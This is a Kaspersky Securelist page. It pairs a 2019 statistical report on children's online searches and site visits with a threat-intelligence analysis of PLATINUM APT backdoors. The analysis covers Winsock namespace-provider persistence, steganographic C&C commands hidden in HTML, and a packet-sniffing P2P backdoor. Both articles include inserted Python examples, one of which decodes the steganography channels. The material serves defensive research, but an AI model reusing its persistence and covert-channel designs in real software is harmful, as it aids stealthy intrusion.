Kaspersky Securelist


What kids get up to online

12 June, 2019 - 12:00

Today’s children navigate the Internet better than adults. They are not afraid to try out new technology, and are quick to grasp new trends and sometimes invent their own. New social networks, mobile games, music, and gadgets are all part and parcel of their daily lives. But just because they feel at home online does not mean that they need not pay attention to potential hazards. To help children avoid potential dangers in the digital world, parents must understand what their children are interested in, know about the latest online trends, and be aware of what might pose a risk.

How statistics are collected

Kaspersky Lab solutions scan the content of web pages that children try to access. If a particular site belongs to one of fourteen unwanted categories, the module sends a notification to the Kaspersky Security Network (there is no transfer of personal user data and no violation of privacy). There are two important things to note about this:

  • Parents decide for themselves what content should be blocked and configure the application accordingly. However, anonymous statistics are collected across all fourteen categories.
  • Data is harvested only from computers running Windows and Mac OS; no mobile statistics are provided in this report.

Website categorization

In products that have Parental Control features, web filtering is currently performed across the following categories:

Filtering search queries

Children’s search activity is the best indicator of their interests. Kaspersky Safe Kids can filter children’s queries in five different search engines (Bing, Google, Mail.ru, Yahoo!, Yandex) on six potentially dangerous topics: Adult Content, Alcohol, Tobacco, Drugs, Racism, and Profanity.

We have grouped the search queries by language. We consider statistics for the English language as international due to its prevalence. All searches in a specific language, minus repeat queries, were taken as the 100% reference value. The popularity of each topic – defined as the percentage of queries about it – is calculated for each separate language and for the entire world.

Search queries sent to us during the period May 2018 – May 2019 were broken down into several thematic categories:

  • Alcohol, Tobacco, Drugs
  • Anime
  • News
  • Memes
  • Celebrities
  • Sports
  • Education
  • Music
  • Online Communication
  • Shopping
  • Online Translators
  • Adult Content
  • Video Games
  • Video
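
To make the share computation described above concrete, here is an added Python example (not Securelist's or Kaspersky's code) that drops repeat queries within each language, uses the deduplicated count as that language's 100% reference value, and reports each topic's percentage per language and pooled worldwide. The keyword-to-topic lookup and the sample queries are constructed for illustration; the page does not describe the real classifier, and pooling every language's deduplicated queries for the worldwide figure is an assumption.

```python
from collections import Counter, defaultdict

# Constructed keyword -> topic lookup (assumption: the page does not
# describe the real classifier).  A query that matches nothing still
# counts toward the language's 100% reference value.
TOPIC_KEYWORDS = {
    "Video": {"youtube", "netflix", "amazon prime"},
    "Video Games": {"fortnite", "roblox", "minecraft"},
    "Online Communication": {"facebook", "instagram", "tiktok", "вк", "скайп"},
    "Shopping": {"amazon", "aliexpress", "авито"},
    "Music": {"spotify", "bts"},
}

# Constructed sample telemetry: (language, raw query).  "YouTube" and
# "youtube" are the same query after normalisation; "вк" repeats in ru.
SAMPLE_QUERIES = [
    ("en", "youtube"), ("en", "YouTube"), ("en", "fortnite"),
    ("en", "netflix"), ("en", "homework help"),
    ("ru", "вк"), ("ru", "авито"), ("ru", "вк"), ("ru", "minecraft"),
]


def normalise(query):
    """Case-fold and trim so that repeat queries collapse to one entry."""
    return " ".join(query.lower().split())


def classify(query):
    """Return the topic for a normalised query, or None if unclassified."""
    for topic, words in TOPIC_KEYWORDS.items():
        if query in words:
            return topic
    return None


def topic_shares(records):
    """Compute topic popularity the way the report describes it.

    records: iterable of (language, query).
    Returns {language: {topic: percent}} with an extra "world" key.
    Repeat queries within a language are dropped before counting, and
    the deduplicated count is the 100% reference value for that language.
    """
    unique = defaultdict(set)
    for lang, query in records:
        unique[lang].add(normalise(query))

    shares = {}
    world_counts = Counter()
    world_total = 0
    for lang, queries in unique.items():
        counts = Counter(classify(q) for q in queries)
        counts.pop(None, None)          # unclassified queries add no topic
        total = len(queries)            # the 100% reference value
        shares[lang] = {t: round(100 * c / total, 2) for t, c in counts.items()}
        world_counts.update(counts)
        world_total += total

    # Assumption: the worldwide figure pools every language's deduplicated
    # queries; the page does not say how "the entire world" is formed.
    shares["world"] = {t: round(100 * c / world_total, 2)
                       for t, c in world_counts.items()}
    return shares


if __name__ == "__main__":
    for lang, topics in topic_shares(SAMPLE_QUERIES).items():
        print(lang, topics)
```

Because deduplication happens per language, the same query in two languages is counted once in each, and an unclassified query ("homework help" above) lowers every topic's share without appearing in any of them. The report's treatment of English as an international language is not modelled here; it only affects how the per-language figures are interpreted, not how they are computed.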

Global picture

Site categories

Over the past year, the global picture has changed quite radically.

Distribution of Parental Control and Safe Kids notifications across fourteen categories, May 2018 – May 2019

A few years ago, we noted a downward trend in the number of visits from PCs to sites in the Online Communication category, and this is continuing. Whereas last year, the share of this category was 59.68%, this year has seen a sharp drop, to 27.61%. At the same time, the share of the Software, Audio, Video category rose to 32.75% against 22.4% last year.

Electronic Commerce ranks third; compared with the data for 2017-2018, the popularity of online stores among children increased dramatically, from 2.83% to 14.18%. Children have started accessing news resources more frequently: Last year, this category accounted for slightly less than one percent, while this year’s figure stands at 8.78%.

The share of computer game-related sites was 3.01%, which is 1.98 p.p. lower than in the previous reporting period. Meanwhile, the share of adult content sites climbed to 2.08%, which is up 1.34 percentage points on last year (0.74%). The share of sites in the Alcohol, Tobacco, Drugs category collapsed, amounting to 0.64% (6.32% in the last reporting period).

Search queries

Distribution of users’ search queries by thematic category, May 2018 – May 2019

Children most commonly search for movies and cartoons on YouTube. Compared to last year, the share of search queries related to video content remained practically the same at 17.91% (17.25% in 2017-2018).

Although children visited gaming sites less frequently, they have not lost interest in the topic; the share of game-related search queries actually increased by 10.84 percentage points to 16.93%. Interest also rose in adult content (from 8.59% to 14.90%) and online shopping (from 2.4% to 8.72%). Meanwhile, interest in online translators remains at the same level as last year: 13.69% in 2018-2019 against 13.58% in the previous reporting period.

The number of queries related to social networks and online communication fell by a couple of percentage points, from 9.88% to 7.27%. This year, children searched more often for music (5.80% in 2018-2019 vs. 3.78% in 2017-2018) and topics related to education (5.45% vs. 4.86%), but there was a decline in the number of searches for anime (from 0.79% to 0.70%) and sports (from 3.69% to 3.40%).

Differences by region, country, and language

To understand the reasons behind the changes, we shall examine each of the popular categories in more detail, and take a look at the changes in different regions and countries.

Software, Audio, Video

Most often, children visited sites – and searched for information – relating to the Software, Audio, Video category.

Popularity of the Software, Audio, Video category in different regions, May 2018 – May 2019

Children in Africa visit sites from this category more than children anywhere else. Their favorites include youtube.com, dvdvideosoft.com, dropbox.com, and play.google.com.

We see a rise in interest in this category in all regions with the exception of the Commonwealth of Independent States (CIS), where a slight drop occurred. This was the first year that we included the regions of Africa and South Asia in the statistics, so a comparison with the previous year is not possible.

Comparison of the popularity of the Software, Audio, Video category in different regions, May 2017 – May 2018 and May 2018 – May 2019

The largest growth in visits to sites with video, music, and software was observed in Arab countries: Their share of the total number of visited resources grew significantly from 8.70% to 42.57%. The most visited resources in this region are youtube.com, dvdvideosoft.com, play.google.com, and uptv.ir.

There was a marked increase in Latin America, too, from 12.60% to 32.54%. The most visited sites in this region are, of course, youtube.com along with play.google.com, dvdvideosoft.com, and spotify.com.

Popularity of the Software, Audio, Video category in different countries, May 2017 – May 2018

Kids in China spend more time than others watching videos and listening to music (69.36%). Last year, China also beat all other countries in this respect, but with a larger figure (78.76%).

Since we expanded the list of countries this time, some of last year’s frontrunners, such as Germany and Russia, are now closer to the foot of the ranking, although their share of visits did not change all that much: Germany (34.05%) saw a 2.09 p.p. swing and Russia (28.23%) a 4.95 p.p. swing.

In some countries, children’s time spent on listening to music and watching videos shot up. The figure grew exponentially in Saudi Arabia (from 0.38% to 51.34%), which could be related to the launch of Spotify in the region, Egypt (from 11.03% to 40.28%), Mexico (from 10.65% to 42.37%), the UAE (from 9.17% to 23.29%), and Brazil (from 13.53% to 27.44%). In all these countries, the most popular site in this category is youtube.com.

Distribution of search queries on the Video topic in different languages, May 2018 – May 2019

As we have seen, the top topic in search queries around the world is video, which generally corresponds to the map of visited sites, where for the first time ever Software, Audio, Video has dislodged Online Communication as the leading category.

In the English language, the percentage of video-related search queries increased against last year from 20.54% to 28.35%. The most common searches were for “youtube,” “netflix,” and “amazon prime.” As in previous years, the most searched-for blogger is PewDiePie. The top cartoon channels are Nickelodeon, Disney, and Cartoon Network. There was also heightened interest in Game of Thrones.

The Video category’s share of searches among Chinese-speaking children this time around came to 21.12% (4.21% in the last reporting period). In Chinese, children searched for 愛奇藝 (iQiyi, the Chinese online video platform) and 復仇者聯盟4 (Avengers: Endgame).

Note that search queries in English reflect the interests not just of English-speaking children, but of all kids in general, since children worldwide often search for platforms, services, games, and social networks by their English names. In particular, the most popular site, as well as the most popular search query among children, is YouTube.

The graph below shows the percentage of YouTube-related search queries in different languages, compared with all other queries on the video topic (cartoons, movies, TV shows). In English, for example, 70.58% of all queries on the video topic are linked to YouTube. Only in China are children not interested in this video platform, since the service is blocked there.

Comparison of the popularity of YouTube-related queries, and other searches on the video topic, May 2018 – May 2019

Another search topic in the Software, Audio, Video category is music. Compared to last year, children searched more often for songs, performers, and music videos. The sharpest hike in music-related queries came in the Japanese language, rising from 0.50% last year to 20.64% this year. This could be because Asian performers are wildly popular these days across the world, in particular the South Korean boy and girl bands BTS and BLACKPINK, and the Japanese virtual singer Hatsune Miku.

Distribution of thematic search queries on the music topic by language, May 2018 – May 2019

Besides music from Asia, children searched in English for the streaming service Spotify, singer Ariana Grande, rapper xxxtentacion (we wrote about him here), performer Marshmello, and singer Billie Eilish.

Online Communication

Each of our reports in recent years has noted a downward trend in children’s use of social networking sites and instant messengers on PCs. And now the day has come when the usual leader Online Communication has given way to video and music as the top category.

Popularity of the Internet Communication Media category in different regions, May 2018 – May 2019

Nevertheless, in our report’s new region, South Asia, children still communicate a lot online using desktops and laptops. In all other regions, we noticed a sharp drop in the number of visits. Facebook remains the most popular site in this category in practically all countries, with the exception of China.

Such a sharp drop in popularity can be put down to the craze among children and teenagers for the “mobile” social network TikTok (we wrote about it on our Kids Kaspersky portal, dedicated to keeping children safe). The steep decline could also be caused by the trend we have long observed for children to increasingly favor mobile over PC-based communication.

Comparison of the popularity of websites in the Internet Communication Media category in different regions, May 2017 – May 2018 and May 2018 – May 2019

Interestingly, as with the Software, Audio, Video category, the largest difference between the reporting periods is seen in Arab and Latin American countries.

Popularity of websites in the Internet Communication Media category in different countries, May 2018 – May 2019

The country-specific data also shows a decline in visits to sites in the Online Communication category. This could be due to various factors, including the scandals around Facebook and VKontakte over the confidentiality of user data, as well as the growing popularity of “mobile” social networks, such as Instagram, SnapChat, and TikTok.

Distribution of search queries on the social networks topic in different languages, May 2018 – May 2019

As for search queries, Russian-speaking children most often searched for “ВК” (VK), “инстаграм” (instagram), and “скайп” (skype). Popular search queries in English were “facebook,” “instagram,” and “tiktok.” In Japanese, the most common searches were for stickers for the messenger Line. And in Arabic, they were for تويتر (Twitter) and Facebook.

Note that the share of search queries related to online communication decreased in most languages, as did visitor traffic to sites in this category. Their share in English decreased by 3.6 p.p. to 6.72%, and in Russian by 4.35 p.p. to 9.11% against the previous reporting period.

Distribution of search queries related to one of the four most popular social networks, May 2018 – May 2019

Electronic Commerce

Popularity of websites in the Electronic Commerce category in different regions, May 2018 – May 2019

Another category of resources more popular this year than last is Electronic Commerce. The most popular sites are Aliexpress, Amazon, and eBay. Children’s interest in the online store Aliexpress is growing year on year. This report has already noted the upward trend in the popularity of services of Chinese origin; for example, the social network TikTok belongs to the Chinese Internet company ByteDance.

Comparison of the popularity of websites in the Electronic Commerce category in different regions, May 2017 – May 2018 and May 2018 – May 2019

The most significant rise in the popularity of online stores over the past year came in CIS countries. The Top 3 sites by number of visits are Avito, Aliexpress, and Wildberries.

Popularity of websites in the Electronic Commerce category in different countries, May 2018 – May 2019

The country-specific data confirms that children in Belarus and Russia show most interest in online shopping.

Distribution of search queries on the online shopping topic in different languages, May 2018 – May 2019

What exactly children were looking for is revealed in the search queries. In Japanese, the most frequent searches were for products from the Rakuten store and the Japanese version of Amazon, as well as candy from the 7-Eleven store. The most popular stores in German were Zalando, Saturn, eBay Kleinanzeigen, and Tiger; in English, Amazon, eBay, Aliexpress, Ikea, and Asos; and in Russian, Aliexpress, Авито (Avito), Юлу (Yulu), and Детский мир (Children’s World).

As for brands, in this reporting period children searched for Nike, Adidas, Samsung, Gucci, Vans, Supreme, Zara, and Bershka. Product-wise, the younger generation showed interest in the iPhone X, iPhone 7, Huawei p20, Samsung S7, Nike and Adidas footwear, and various books.

Video Games

Compared to last year, the share of this category decreased almost threefold. This does not mean that children are losing interest in games, since some of the content they watch on YouTube is devoted specifically to games, including walkthroughs, analysis, and reviews.

Share of websites in the Video Games category in different regions, May 2018 – May 2019

Not for the first year, the region with the largest gaming category share is Oceania. And this year we saw growth: from 11.03% to 13.63%. The most popular gaming sites in Oceania are roblox.com, blizzard.com, steamcommunity.com, ubisoft.com, and ea.com.

In North America, the share of visits to gaming sites from PCs dropped from 13.05% to 7.70%. The most popular sites in this region are roblox.com, blizzard.com, and twitch.tv.

Comparison of the popularity of websites in the Video Games category in different regions, May 2017 – May 2018 and May 2018 – May 2019

The share of this category decreased in other regions, too. For instance, it fell from 10.02% to 4.19% in Europe, from 3.96% to 1.24% in Latin America, and from 3.03% to 2.81% in the CIS. In others, meanwhile, it increased: from 1.49% to 2.04% in the Arab world, and from 2.93% to 4.71% in Asia.

Popularity of websites in the Video Games category in different countries, May 2018 – May 2019

In the diagram, we see that in Australia (part of the Oceania region) the Video Games category has a greater share than in other countries (12.74%). It is followed by Germany (10.59%), which last year came mid-table, but this time ousted the UK (8.21%) from second place.

But the share of this category is still on a downward trend. This is likely due to the increased popularity of mobile games, which now attract children more than PC games. Overall, the mobile games market is growing year on year.

That said, PC games are still popular, although many of them have been adapted to mobile platforms and consoles. One example is Minecraft, which, judging by kids’ search queries, is still in high demand.

Distribution of search queries on the Video Games topic in different languages, May 2018 – May 2019

Unsurprisingly, the lion’s share of game-related search queries are in English, since most games have English-language titles. The most popular queries in English this past year were: fortnite, roblox, minecraft, epic games (the publisher of Fortnite), steam, twitch, discord, overwatch, and pubg.

It is worth noting that many of the top search queries in English were related to Fortnite, for example: fortnite tracker, fortnite download, fortnite battle royale, and epic games fortnite.

Fortnite is available on almost all possible gaming platforms (Microsoft Windows, macOS, Xbox One, PlayStation 4, iOS, Android, Nintendo Switch). The gameplay originally consisted in studying the in-game map, collecting resources, building fortifications, and simply surviving (including defending yourself against night-time zombies). But then the developers released the multiplayer deathmatch mode Fortnite Battle Royale, which later turned into a full-fledged game and became even more of a hit than the original. The queries “fortnite mobile” and “fortnite android” confirm our suspicion that children are increasingly switching allegiance to mobile games.

In addition to PC and mobile games, children were interested in consoles. They searched for Nintendo Switch, PS4, Xbox, and Playstation.

Adult Content

Many people worry about the extent to which children are interested in pornography and erotica.

In terms of percentage of all website categories visited from PCs, the Adult Content category in the past reporting year accounted for 2.08%, up 1.34 p.p. on last year (0.74%).

Share of websites in the Adult Content category in different regions, May 2018 – May 2019

The statistics by region show that the largest share of visits to adult sites belongs to Latin America (4.28%). In second place is South Asia (2.74%), with Asia in third place on 2.26%.

Comparison of the popularity of websites in the Adult Content category in different regions, May 2017 – May 2018 and May 2018 – May 2019

Compared to last year, the share of adult sites in Latin America climbed from 0.63% to 4.28%. In the CIS, we also saw an increase: from 0.48% to 2.09%. The most popular resources in the Adult Content category, as previously, are pornhub.com, xnxx.com, and livejasmin.com. Interestingly, in some regions this category became less popular. For example, it fell from 1.18% to 0.84% in Europe.

This is not the first year that Asia has posted an increased interest in the topic of pornography and erotica. Interestingly, this year it declined from 2.72% to 2.26%, but still remained quite high compared to other regions.

Share of websites in the Adult Content category in different countries, May 2018 – May 2019

Children in Japan are the most likely to try to visit (or actually visit if there is no parental block) porn sites – 7.82% of all website categories accessed by children from PCs. In second place is Brazil (7.34%), where children also show interest in adult content. Third place goes to Mexico (5.45%). The high figures in these countries mean that Asia and Latin America are the world’s leading regions in this category.

The language with the largest share of all porn-related search queries is Portuguese.

Distribution of search queries related to adult content in different languages, May 2018 – May 2019

In second place is Arabic, which last year accounted for the largest share of porn-related search queries (34.32%). Search queries in German came third.

Of interest here is not so much the sites that children visit from PCs, but the search queries they make; as we have noted in previous reports, children prefer viewing porn from mobile devices rather than from PCs. Therefore, it would not be amiss to compare the search figures for the past two years:

Comparison of the popularity of Adult Content search queries in different languages, May 2017 – May 2018 and May 2018 – May 2019

Alcohol, Tobacco, Drugs

In the past two years, we have witnessed a downward trend in the number of visits by children worldwide to sites in the Alcohol, Tobacco, Drugs category.


Comparison of the popularity of websites in the Alcohol, Tobacco, Drugs category in different regions, May 2016 – May 2017, May 2017 – May 2018, and May 2018 – May 2019 (download)

Another reason for the decrease in the number of visits to sites in this category may be the loss of interest in electronic cigarettes and vapes. Whereas two or three years ago, vaping was all the rage, it is now a niche activity.


Popularity of websites in the Alcohol, Tobacco, Drugs category in different regions, May 2018 – May 2019 (download)

All the same, children in North America and Oceania are the most likely to visit sites related to alcohol, tobacco, or drugs. But in Europe, the figure fell against previous years. Interestingly, despite the regional figures, the share of visits to alcohol-, tobacco-, and drug-related sites in Japan (2.21%) is higher than in other countries. The US is in second place (1.59%), and Germany is in third (1.00%).


Popularity of websites in the Alcohol, Tobacco, Drugs category in different countries, May 2018 – May 2019 (download)

We cannot say for sure that children intentionally visit sites with such content, since the search queries that best reflect kids’ interest in the subject do not reveal any increase in such interest.


Distribution of search queries on the Alcohol, Tobacco, Drugs topic in different languages, May 2018 – May 2019 (download)

That said, in Chinese, children searched for 酒, 毒品 (alcohol, drugs); in German, “rauchen” (smoking), “bier” (beer), and “zigaretten” (cigarettes); in Portuguese, “maconha” (marijuana) and “caipirinha” (a Brazilian cocktail); and in Russian, “наркотики” (drugs), “алкоголь” (alcohol), and “сигареты” (cigarettes).

Other

Besides the categories examined in this report, our investigation of search queries revealed other topics of interest to kids. For instance, search queries related to online translators are among the most popular.


Distribution of search queries related to the topic of online translation in different languages, May 2018 – May 2019 (download)

In French, children searched for “traduction francais anglais” and “traduction espagnol français”; in Spanish, “traductor español ingles” and “traductor español frances”; in Italian, “traduttore inglese italiano” and “traduttore francese italiano”; and in German, “google übersetzer” and “englisch deutsch”.


Distribution of sports-related search queries in different languages, May 2018 – May 2019 (download)

Portuguese-speaking children showed most interest in the topic of sport. Their search queries included Brazilian soccer stars and match results. Sports were also of great interest to children in the Arab world and Spanish-speaking countries. The vast majority of queries were soccer-related.


Distribution of celebrity-related search queries in different languages, May 2018 – May 2019 (download)

Children also searched for information about real-life celebrities and various fictional characters. Interestingly, whatever the language, children most often searched for the same names: Harry Potter, Hitler, Donald Trump, and Kim Kardashian.

Alongside entertainment, children also use the Internet for educational purposes. The largest share of queries on the education topic were in Russian.


Distribution of search queries on the Education topic in different languages, May 2018 – May 2019 (download)

Conclusion

Every year, we see increasing numbers of children going online from mobile devices. Whereas this trend used to be more pronounced in Western countries than in the Arab world and Latin America, kids in these regions too are starting to switch to mobile platforms.

This is evidenced, above all, by the decrease in the number of visits to social networking sites from PCs. Developers are actively supporting users’ transition to mobile devices, adapting their services to smartphone screens. New social networks aimed exclusively at smartphones are becoming extremely popular with children and teenagers, who pick up innovations before adults do. Last year, for instance, the world of social networks was rocked by TikTok; Instagram and SnapChat are also increasing their audiences. Despite remaining the most popular social network in the world, Facebook is attracting ever fewer children and teenagers in the West.

Games, just like social networks, are increasingly shifting to mobile platforms. A good example is Fortnite, which children prefer to play on mobile devices and is (according to search queries) more popular than Roblox and Minecraft.

When it comes to online shopping, children still favor PCs. This is not surprising, since not all online stores have a user-friendly app or mobile version. Not for the first year did we see a rise in the popularity of the Software, Audio, Video category, and this was the first year that it dislodged Online Communication from the top of the leaderboard. Children increasingly prefer to spend time watching videos on YouTube, and in addition to clips on the video hosting site, they also showed interest in Game of Thrones, the series Riverdale, and the latest Avengers.

We recommend using parental control to keep tabs on what children are looking at. Kaspersky Lab’s parental control component forms part of the Kaspersky Internet Security and Kaspersky Total Security solutions. We also have a separate product, Kaspersky Safe Kids, which not only prevents children from accessing undesirable websites, but notifies parents about what their children have been searching for online, and helps track their location and manage their gadget time.

Platinum is back

5 June, 2019 - 13:07

In June 2018, we came across an unusual set of samples spreading throughout South and Southeast Asian countries targeting diplomatic, government and military entities. The campaign, which may have started as far back as 2012, featured a multi-stage approach and was dubbed EasternRoppels. The actor behind this campaign, believed to be related to the notorious PLATINUM APT group, used an elaborate, previously unseen steganographic technique to conceal communication.

As a first stage the operators used WMI subscriptions to run an initial PowerShell downloader which, in turn, downloaded another small PowerShell backdoor. We collected many of the initial WMI PowerShell scripts and noticed that they had different hardcoded command and control (C&C) IP addresses, different encryption keys, salt for encryption (also different for each initial loader) and different active hours (meaning the malware only worked during a certain period of time every day). The C&C addresses were located on free hosting services, and the attackers made heavy use of a large number of Dropbox accounts (for storing the payload and exfiltrated data). The purpose of the PowerShell backdoor was to perform initial fingerprinting of a system since it supported a very limited set of commands: download or upload a file and run a PowerShell script.

At the time, we were investigating another threat, which we believe to be the second stage of the same campaign. We were able to find a backdoor that was implemented as a DLL and worked as a WinSock NSP (Nameservice Provider) to survive a reboot. The backdoor shares several features with the PowerShell backdoor described above: it has hardcoded active hours, it uses free domains as C&C addresses, etc. The backdoor also has a few very interesting features of its own. For example, it can hide all communication with its C&C server by using text steganography.

After deeper analysis we realized that the two threats were related. Among other things, both attacks used the same domain to store exfiltrated data, and we discovered that some of the victims were infected by both types of malware at the same time. It’s worth mentioning that in the second stage, all executable files were protected with a runtime crypter and after unpacking them we found another, previously undiscovered, backdoor that is known to be related to PLATINUM.

Our paper only includes a description of the two previously undiscovered backdoors while the full report is available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com).

Steganography backdoor

The main binary backdoor is installed with a dedicated dropper. When the dropper is run, it decrypts files that are embedded into its “.arch” section:

Next, it creates directories for the backdoor to operate in and saves the malware-related files in these. It normally uses paths like those used by legitimate software.

Typically, the malware drops two files: the backdoor itself and its configuration file.

After this, the dropper runs the backdoor, installs it to enable a persistence mechanism and removes itself. The configuration file always has a .cfg or .dat extension and contains the following options, encrypted with AES-256 CBC and encoded:

  • pr – stands for “Poll Retries” and specifies the interval in minutes after which the malware sends the C&C server a request for new commands to execute;
  • ht – unused;
  • sl – specifies the date and time when the malware starts running. When the date arrives, the malware clears this option;
  • opt – stands for “Office Hours”. This specifies the hours and minutes during the day when the malware is active;
  • die – stands for “Eradicate Days”. This specifies how many days the malware will work inside the victim’s computer;
  • Section “p” lists malware C&C addresses;
  • Section “t” lists legitimate URLs that will be used to ensure that an internet connection is available.

Persistence

The main backdoor is implemented as a dynamic link library (DLL) and exports a function with the name “NSPStartup”. After dropping it, the installer registers the backdoor as a winsock2 namespace provider with the help of the WSCInstallNameSpace API function and runs it by calling WSCEnableNSProvider.

As a result of this installation, during initialization of the “svchost -k netsvcs” process upon system startup, the registered namespace provider will be loaded into the address space of the process and the function “NSPStartup” will be called.

C&C interaction

Once up and running, the backdoor compares the current time against the “Eradicate Days”, activation date and “Office Hours” values, and locates valid proxy credentials in “Credential Store” and “Protected Storage”.

When all the rules are fulfilled, the backdoor connects to the malware server and downloads an HTML page.

On the face of it, the HTML suggests that the C&C server is down:

However, this is because of the steganography. The page contains embedded commands that are encrypted with an encryption key, also embedded into the page. The embedded data is encoded with two steganography techniques and placed inside the <--1234567890> tag (see below).

On line 31, the attributes “align”, “bgcolor”, “colspan” and “rowspan” are listed in alphabetical order, whereas on line 32, the same attributes are listed in a different order. The first steganography technique is based on the principle that HTML is indifferent to the order of tag attributes, so a message can be encoded by permuting them. Line 31 in the example above contains four tags; the number of permutations of the four attributes is 4! = 24, so the line encodes ⌊log2(24)⌋ = 4 bits of information. The backdoor decodes line by line and collects an encryption key for the data; the data itself is placed right after the HTML tags, also in an encoded state, but using a second steganography technique.

The image above shows that the data is encoded as groups of spaces delimited with tabs. Each group contains from zero to seven spaces, and the number of spaces represents the next three bits of data. For example, the first group on line 944 contains six spaces, so it is decoded as 6₁₀ = 110₂.
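The two decoding steps just described, as an added analysis example that is not the backdoor’s code or Kaspersky’s: a Python extractor that recovers the key bits from attribute order and the data bits from the space/tab runs. The report does not state the permutation-to-value mapping, the bit packing, or how payload lines are located, so the lexicographic rank, MSB-first packing and "whitespace-only lines containing a tab" layout below are assumptions, as is the sample page.

```python
"""Extract the two steganographic channels from a PLATINUM-style HTML page:
attribute-order permutations (key) and space/tab runs (data).
Added example; mapping and page layout are assumptions, not from the malware."""
import itertools
import re

# The four attributes whose order carries the key bits (named in the report).
ATTRS = ("align", "bgcolor", "colspan", "rowspan")
# Assumption: the lexicographic rank of the permutation is the hidden value;
# only its low 4 bits are used, since 4! = 24 orderings give at most 4 clean bits.
PERM_RANK = {p: i for i, p in enumerate(itertools.permutations(ATTRS))}

TAG_RE = re.compile(r"<[a-zA-Z][\w-]*\s+([^>]*)>")   # a tag with attributes
ATTR_NAME_RE = re.compile(r"\b([a-zA-Z]+)\s*=")      # attribute names in order


def key_bits_from_line(line):
    """First technique: 4 bits per tag carrying the four attributes, else ''."""
    out = []
    for body in TAG_RE.findall(line):
        order = tuple(n.lower() for n in ATTR_NAME_RE.findall(body)
                      if n.lower() in ATTRS)
        if len(order) == 4 and len(set(order)) == 4:
            out.append(format(PERM_RANK[order] & 0xF, "04b"))
    return "".join(out)


def data_bits_from_line(line):
    """Second technique: groups of 0-7 spaces delimited by tabs, 3 bits each."""
    bits = []
    for group in line.split("\t"):
        if group.strip(" "):
            raise ValueError("payload line contains a non-whitespace character")
        if len(group) > 7:
            raise ValueError("a run of more than 7 spaces cannot encode 3 bits")
        bits.append(format(len(group), "03b"))
    return "".join(bits)


def bits_to_bytes(bits):
    """Pack a bit string MSB-first; an incomplete trailing byte is dropped."""
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def extract_hidden(html):
    """Return (key_bytes, data_bytes) recovered from the page.
    Assumption: payload lines are whitespace-only lines that contain a tab;
    every other line is scanned for attribute-order key bits."""
    key_bits, data_bits = [], []
    for line in html.splitlines():
        if line and "\t" in line and not line.strip(" \t"):
            data_bits.append(data_bits_from_line(line))
        else:
            key_bits.append(key_bits_from_line(line))
    return bits_to_bytes("".join(key_bits)), bits_to_bytes("".join(data_bits))


# Constructed sample page (not a real C&C page): four table cells whose
# attribute order encodes the key bytes 0x4b 0x37, followed by two
# whitespace-only lines whose space runs (2,2,0,6 / 4,4,4,1) encode "Hi!".
SAMPLE_HTML = (
    "<html><body><table>\n"
    '<tr><td align="center" rowspan="1" bgcolor="#fff" colspan="2">down</td></tr>\n'
    '<tr><td bgcolor="#fff" rowspan="1" colspan="2" align="center">down</td></tr>\n'
    '<tr><td align="center" colspan="2" rowspan="1" bgcolor="#fff">down</td></tr>\n'
    '<tr><td bgcolor="#fff" align="center" rowspan="1" colspan="2">down</td></tr>\n'
    "</table>\n"
    "  \t  \t\t      \n"
    "    \t    \t    \t \n"
    "</body></html>\n"
)

if __name__ == "__main__":
    key, data = extract_hidden(SAMPLE_HTML)
    print("key:", key.hex(), "data:", data)   # key: 4b37 data: b'Hi!'
```

With a real page the recovered key would be fed, together with the IV the report does not describe, into AES-256 CBC decryption of the recovered data; that step is deliberately left out here.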

Decryption of the decoded data using the decoded AES-256 CBC key is a logical continuation.

The result is a list of commands to execute, protected the same way as the backdoor configuration file:

Raw command data extracted from the HTML page

An interpretation of the raw commands extracted from the HTML page after decryption

Commands

The backdoor that we’ve discovered supports the uploading, downloading and execution of files; it can handle requests for a process list and directory list, upgrade and uninstall itself, and modify its configuration file. Each command has its own parameters, e.g. the C&C server that it requests to download or upload files, or whether to split a file while uploading.

Config manager

While investigating further, we found another tool that turned out to be a configuration manager – an executable whose purpose was to create configuration and command files for the backdoors. The utility can configure more than 150 options.

For example, below is the result of executing the showcfg command.


The second command it supports is updatecfg, whose job was to put values specified by the operator into the configuration file.

Also, the config manager supports Upload, Download, Execute, Search, UpdateConfig, AddKeyword, ChangeKeywordFile, ChangeKey, Upgrade and Uninstall commands. After executing any of these it creates a command file, protected the same way as the configuration file, and stores it in the “CommandDir” directory (the path is specified in the configuration, option 11). As described in the ‘Steganography backdoor’ section, this backdoor doesn’t handle command files and doesn’t support commands such as ChangeKeywordFile and ChangeKey, so we figured that there was another backdoor, which made a pair with the config manager we had found. Although it would appear such a utility should run on the attacker side, we found a victim infected with this and a corresponding backdoor located in the vicinity. We called it a P2P backdoor.

P2P backdoor

This backdoor shares many features with the previous one. For example, many of the commands have similar names, both backdoors’ configuration files have options with identical names and are protected the same way, and the paths to the backdoor files are similar to legitimate ones. However, there are significant differences, too. The new backdoor actively uses many more of the options from the config, supports more commands, is capable of interacting with other infected victims and connecting them into a network (see the “Commands” section for details), and works with the C&C server in a different way. In addition, this backdoor actively uses logging: we found a log file dating back to 2012 on one victim PC.

C&C interaction

This backdoor has the ability to sniff network traffic. After the backdoor is run, it starts a sniffer for each network interface in order to detect a specially structured packet, which is sent to the victim’s ProbePort specified in the configuration. When the sniffer finds a packet like that, it interprets it as a request to establish a connection and sets TransferPort (specified in the configuration) to listening mode. The requester immediately connects to the victim’s TransferPort and both sides perform additional checks, exchanging their encryption keys. Then the connection requester sends commands to the victim, and the victim processes these interactively. This approach allows the backdoor to stay reachable without keeping any socket in listening mode – it only creates a listening socket when it knows that someone is trying to connect.

Commands

The backdoor supports the same commands as the steganography backdoor and implements an additional one. The backdoor leverages the Windows index service and can search files for keywords provided by the attacker. This search can be initiated by an attacker request or on a schedule – keywords for a scheduled search are stored in a dedicated file.

All commands are supplied to the backdoor through command files. The command files are protected the same way as the config (see below).

This consists of a command id (id), a command date (dt), a command name (t) and arguments (cmd).

